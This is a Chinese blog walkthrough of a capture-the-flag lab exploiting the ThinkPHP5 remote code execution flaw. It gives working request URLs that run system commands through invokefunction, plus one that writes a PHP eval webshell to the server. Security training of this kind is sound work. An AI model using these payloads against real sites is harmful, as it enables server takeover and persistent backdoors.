网盾安全学院综合靶场-ThinkPHP5 远程代码执行漏洞通关功略

h1ck0r

已于 2022-02-24 23:49:15 修改

阅读量3.4k

点赞数 2

分类专栏：靶场实战

于 2022-02-24 23:48:17 首次发布

本文链接：https://blog.csdn.net/m0_54360887/article/details/123123545

版权

ThinkPHP5 远程代码执行漏洞利用 webshell 命令注入

关键词由CSDN通过智能技术生成

靶场实战专栏收录该内容

1 篇文章 0 订阅

订阅专栏

漏洞概述

我们知道在ThinkPHP5中是有远程代码执行漏洞的。这个漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。

write up

靶场地址：http://ctf.wangdun.cn

靶场信息：

影响范围

ThinkPHP 5.0.全版本

这个漏洞在测试当中发现该漏洞并不通杀，还是得看复现的版本，目前所测试的情况如下：

当前映射80端口为47052，我们访问该地址

我们可以构造payload来测试下命令执行漏洞：

http://ctf.wangdun.cn:47052/
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

命令成功执行，当然此时我们可以直接去查看tmp目录下的flag了

http://ctf.wangdun.cn:47052/
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

当然这里的操作思路还有其他，比方说可以直接写入webshell，比方说这里直接插入一句话

http://ctf.wangdun.cn:47052/
/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[pass])?%3E

大家可以去测试下，我是mac电脑，所以没法用菜刀去尝试了，大家可以去尝试下

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

h1ck0r

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Thinkphp漏洞远程代码执行漏洞事件分析报告

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

11-19

4947

Thinkphp漏洞是继ECShop代码执行漏洞之后，又一次经典的0day漏洞挖掘利用过程。从漏洞刚被挖掘出来时的试探性攻击，到之后有目的、有针对性地攻击虚拟币类、投资金融类的网站，最后到漏洞曝光后的大规模批量性攻击，成为黑产和僵尸网络的工具，给我们展示了一条完整的0day漏洞生命线。 Thinkphp5漏洞背景 2018年12月10日，ThinkPHP 官方发布《ThinkPHP 5.* 版本安全更新》，修复了一个远程代码执行漏洞。由于 ThinkPHP 框架对控制器名没有进行足够的检测，导致攻击者可能可

vulhub靶场thinkphp漏洞复现

weixin_44300286的博客

03-08

1626

0x01、ThinkPHP 2.x 任意代码执行漏洞原理 ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。 ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。漏洞复现直接

参与评论您还未登录，请先登录后发表或查看评论

【vulhub靶场之thinkphp】——（5-rce）

weixin_57240513的博客

08-07

444

docker-compose ps//查看开启的端口。

thinkphp5.0.23命令执行-靶场复现

m0_66376444的博客

04-19

1066

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下，由于修改了method函数的逻辑，无法随意用变量，这里统一用只能用get[],route[]。命令执行成功，可以看出是windows，所以我用nc来拿shell。本次测试版本：thinkphp5.0.23。三、thinkphp总述。

Thinkphp5x远程命令执行靶场攻略

最新发布

shw_yzh的博客

09-23

343

环境配置云服务器：47.113.231.0:8080 靶场：vulhub/thinkphp/5-rce docker-compose up -d #启动环境漏洞复现 1.访问靶场：http://47.113.231.0:8080/ 2.远程命令执⾏ POC： ? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=

漏洞通告ThinkPHP远程代码执行漏洞

05-05

【漏洞通告】ThinkPHP远程代码执行漏洞

Thinkphp-5-0远程代码执行漏洞1

08-03

### ThinkPHP 5.0 远程代码执行漏洞解析 #### 漏洞背景与概述在本篇文章中，我们将深入探讨一个出现在ThinkPHP 5.0版本中的远程代码执行漏洞（RCE）。该漏洞的存在使得攻击者能够在满足特定条件的情况下，通过...

ThinkPHP 5.0 远程代码执行漏洞分析

02-21

### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架，它提供了丰富的功能和良好的性能。然而，如同任何复杂的软件系统一样，它也存在安全漏洞。本次分析的焦点集中在...

thinkphp5远程执行代码漏洞修复补丁.zip

04-17

标题中的“thinkphp5远程执行代码漏洞修复补丁”指的是ThinkPHP5框架存在一个严重的安全问题，即远程代码执行漏洞（通常称为RCE）。在ThinkPHP5中，这个漏洞允许攻击者通过精心构造的HTTP请求，执行任意系统命令，...

ThinkPHP5--rce远程代码执行

m0_74402888的博客

04-30

887

在ThinkPHP5版本中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

PHP 开发框架安全：ThinkPHP 序列漏洞测试.

Innocence_0的博客

07-23

1095

本身不断更新和改进，以应对新的安全威胁和漏洞。什么是 ThinkPHP 框架.ThinkPHP 框架的安全特性：开启漏洞靶场：（1）查看目录：（2）启用 vulhub 漏洞：（3）进行浏览：主机的 8080 端口.进行漏洞测试：（1）查看是不是 ThinkPHP 框架.（查看数据包的信息）（2）如果知道他是这个漏洞，则可以自己使用工具进行测试。（3）漏洞的利用：（4）使用连接工具（蚁剑）进行连接.

Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现（六十四）

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

06-23

1292

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装，我们进入 ThinkPHP漏洞环境，可以 cd ThinkPHP，然后通过 ls 查看可以搭建的靶场，目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。

CTF——Thinkphp5远程命令执行漏洞利用

qq_45521281的博客

05-03

7543

[BJDCTF 2nd]old-hack（5.0.23）进入之后：打开页面，页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此，这里用到了thinkphp5的远程命令执行漏洞。 Thinkphp5远程命令执行漏洞漏洞描述：由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造，该功能利用 $_POST['_meth...

渗透靶场——vulntarget-d综合靶场

tlovejr的博客

04-01

2917

部署环境此次靶场共两个个镜像文件，接下来先给大家说一下整个环境的拓扑图以环境布置。信息收集扫描主机扫描同一网段中的存活主机发现存活主机ip地址（其他ip是我其他机器的ip地址） 192.168.1.17 扫描端口扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.17 发现开放了80、81、3306、8888，看这架势应该是宝塔的界面，那就先访问端口看看访问80端口发现不可 web渗透访问81端口在这里发现了一个骑士的cms框架界面看到底下的版本信息，搜索

ctf攻防世界 WEB题:php_rce

qq_30889301的博客

05-09

1030

ThinkPHP是一个基于PHP语言的开源Web应用框架，它提供了一系列的工具和组件，可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点，被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具：https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容，非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例，我们只需要更改就可以了。

ctfshow web入门(thinkphp专题)

Blazing-Angel的博客

02-09

813

569 URL模式查阅手册：URL模式 · ThinkPHP3.2.3完全开发手册 http://serverName/index.php/模块/控制器/操作 payload: 普通模式：/?m=Admin&c=Login&a=ctfshowLogin Pathinfo模式：/index.php/Admin/Login/ctfshowLogin 兼容模式：/?s=/Admin/Login/ctfshowLogin 570 路由发现路由：根据手册：直接构造：这里直接执行不可以

ThinkPHP 5.0 远程代码执行漏洞详解

"ThinkPHP 5.0 远程代码执行漏洞分析" 在网络安全领域，远程代码执行漏洞是一种极其危险的漏洞，允许攻击者在受害者的服务器上执行任意代码。这篇关于ThinkPHP 5.0 远程代码执行的分析报告，专注于探讨了如何利用这...